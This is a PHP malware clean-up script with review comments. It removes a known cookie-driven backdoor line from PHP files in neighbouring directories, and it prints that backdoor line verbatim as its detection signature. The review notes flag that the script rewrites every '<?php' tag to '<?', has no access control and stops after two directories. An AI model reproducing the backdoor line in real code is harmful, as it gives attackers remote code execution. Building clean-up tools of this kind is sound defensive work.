cut_infected_code.php
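<?php
// Clean-up pass over the sibling directories of the current working directory:
// every file whose name contains ".php" is read, handed to check_code(), and
// rewritten in place when check_code() changed it. Each rewrite attempt is
// appended to check_log.txt in the document root.
//
// NOTE(review): nothing in this script restricts who may run it, and it
// rewrites PHP files on disk. If it is reachable over HTTP, restrict access to
// it and remove it from the web root once the clean-up is finished.
header('Content-Type: text/html; charset=utf-8');

$script_name = basename(__FILE__);

// NOTE(review): the log sits inside the document root, so the list of affected
// file paths may be readable by any visitor. Consider a location outside it.
$log_file = $_SERVER['DOCUMENT_ROOT'].'/check_log.txt';

// Initialised up front so sort() and foreach still get an array when the
// parent directory cannot be opened or holds no matching entries.
$all_directory = array();
if ($handle = opendir('../')) {
    while (false !== ($file = readdir($handle))) {
        // strpos() is compared with false explicitly: a match at offset 0 is
        // falsy and would otherwise be treated as "no .zip in the name".
        if ($file != "." && $file != ".." && strpos($file, '.zip') === false) {
            $all_directory[] = $file;
        }
    }
    closedir($handle);
}
sort($all_directory);

$i = 0;
foreach ($all_directory as $directory) {
    $dir_path = '../'.$directory;

    // Entries of ../ may be regular files; is_dir() keeps opendir() from
    // raising a warning on them.
    if (is_dir($dir_path) && ($handle = opendir($dir_path))) {
        while (false !== ($file = readdir($handle))) {
            if ($file == "." || $file == ".." || $file == $script_name) {
                continue;
            }
            if (strpos($file, '.php') === false) {
                continue;
            }

            $path = $dir_path.'/'.$file;
            if (!is_file($path)) {
                continue;
            }

            $event = null;
            $raw = file_get_contents($path);
            if ($raw === false) {
                $event = "Не удалось прочитать файл >>> $directory/$file";
            } else {
                // check_code() matches against HTML-escaped text. Escaping with
                // a single-byte charset leaves every non-special byte as it is,
                // so a file that is not valid UTF-8 is neither emptied nor has
                // bytes substituted before it is written back.
                $code = htmlspecialchars($raw, ENT_COMPAT, 'ISO-8859-1');
                $clear_code = check_code($code);

                if ($code !== $clear_code) {
                    // Write back to the file that was read. The bare file name
                    // would resolve against the working directory and leave
                    // the scanned file untouched.
                    // A result of 0 bytes is a successful write of an empty
                    // file, so only false counts as failure.
                    if (file_put_contents($path, $clear_code) === false) {
                        $event = "Не удалось записать в файл >>> $directory/$file";
                    } else {
                        $event = "Вредоносный код вырезан из файла >>> $directory/$file";
                    }
                }
            }

            if ($event !== null) {
                $msg = date('d.m.Y H:i:s').' -- '.$event."\n";
                file_put_contents($log_file, $msg, FILE_APPEND);
            }
        }
        closedir($handle);
    }

    $i++;
    echo $i;
    // NOTE(review): the run stops after the first two entries of ../, so later
    // directories are never scanned. This looks like a leftover test limit;
    // confirm before relying on the log as a complete result.
    if ($i == 2) break;
}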
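/**
 * Remove one known injected line from HTML-escaped PHP source.
 *
 * The signature is the statement that calls the function named in the "user"
 * cookie with the "id" cookie as its argument, i.e. a cookie-driven backdoor.
 * Matching is an exact byte comparison, so a variant with different spacing,
 * quoting or cookie names is not detected; a clean result from this function
 * does not show that a file is free of injected code.
 *
 * @param string $code File contents already passed through htmlspecialchars().
 * @return string The input unchanged when nothing matched; otherwise the
 *                modified text, HTML-decoded back to plain source.
 */
function check_code($code)
{
    $find = false;

    // Compared with false explicitly: a match at offset 0 is falsy and would
    // be skipped by a bare truthiness test. This now agrees with the second
    // check below.
    $needle = htmlentities('if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);');
    if (strpos($code, $needle) !== false) {
        $code = str_replace($needle, "", $code);
        $find = true;
    }

    // NOTE(review): every "<?php" in the file is rewritten to "<?", and any
    // file containing "<?php" is therefore reported as changed even when the
    // signature above is absent. The rewritten files also depend on
    // short_open_tag being enabled; with it disabled they would be sent to the
    // client as plain text. Confirm this normalisation is intended.
    $needle = htmlentities('<?php');
    $replacement = htmlentities('<?');
    if (strpos($code, $needle) !== false) {
        $code = str_replace($needle, $replacement, $code);
        $find = true;
    }

    // Only a modified text is decoded; untouched input is returned still
    // escaped so the caller can detect a change by comparing the two strings.
    if ($find) {
        $code = html_entity_decode($code);
    }

    return $code;
}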
// Tell the operator where the run log was written.
// NOTE(review): this prints the absolute document-root path into the response;
// if the script is reachable by untrusted clients that discloses the server's
// filesystem layout.
$log_location = $_SERVER['DOCUMENT_ROOT'].'/check_log.txt';
echo 'Лог работы скрипта сохранен в файл - '.$log_location;
?>